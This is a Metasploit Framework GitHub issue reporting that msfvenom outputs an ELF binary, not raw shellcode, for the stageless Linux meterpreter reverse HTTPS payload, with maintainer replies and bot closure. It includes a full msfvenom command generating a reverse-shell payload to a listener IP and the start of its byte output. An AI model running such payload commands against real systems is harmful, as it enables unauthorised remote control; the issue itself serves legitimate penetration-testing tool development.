search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.72k stars 13.89k forks source link

ELF Binary for Linux payloads instead of ShellCode #10893

Closed mubix closed 3 years ago

mubix commented 5 years ago

Steps to reproduce

How'd you do it?

# ./msfvenom -a x86 --platform linux -p linux/x86/meterpreter_reverse_https LHOST=192.168.1.100 LPORT=443 -f c | head -n 50
No encoder or badchars specified, outputting raw payload
Payload size: 961872 bytes
Final size of c file: 4039887 bytes
unsigned char buf[] =
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x03\x00\x03\x00\x01\x00\x00\x00\xb2\x4a\x00\x00\x34\x00"
"\x00\x00\xa0\xa8\x0e\x00\x00\x00\x00\x00\x34\x00\x20\x00\x05"
"\x00\x28\x00\x1e\x00\x1b\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x28\x20\x0c\x00\x28\x20\x0c"

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Expected behavior

What should happen? SHELLCODE

Current behavior

What happens instead? ELF

System stuff

Metasploit version

af61e075363b9165f81c6d92921d4d87375114f3 Weekly dependency update

I installed Metasploit with:

OS

What OS are you running Metasploit on?

Debian 9

mubix commented 5 years ago

As talked about on slack, the short term fix is to warn users that the output isn't shellcode, but an ELF binary and should be treated as such instead of as shellcode to be used

busterb commented 5 years ago

Stageless mettle falls through a special case in the payload generator currently, since we actually just package the elf file generated by the compiler during the build process, as opposed to inserting the entirety of the stageless payload into a template binary.

This made it easy to support the number of architectures it supports without having to write an ELF injector for all of them right away, but does mean that it's kind of cheating and not actually delivering the payload as real shellcode. I think it could especially for the msfvenom case at least, since we do have the .bin images and loaders for a handful of architectures. We'd just need to restrict so that the ones we don't have loaders for are not generable for non-elf.

mubix commented 5 years ago

@busterb that' would be awesome. Currently trying to generate Linux shellcode for a project and having a ton of issues trying to scrape it out of the code, so any hints on how to do that in the mean time would be greatly appreciated.

wvu commented 5 years ago

@mubix: Can you get by with stager shellcode? Or does it have to be stageless?

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.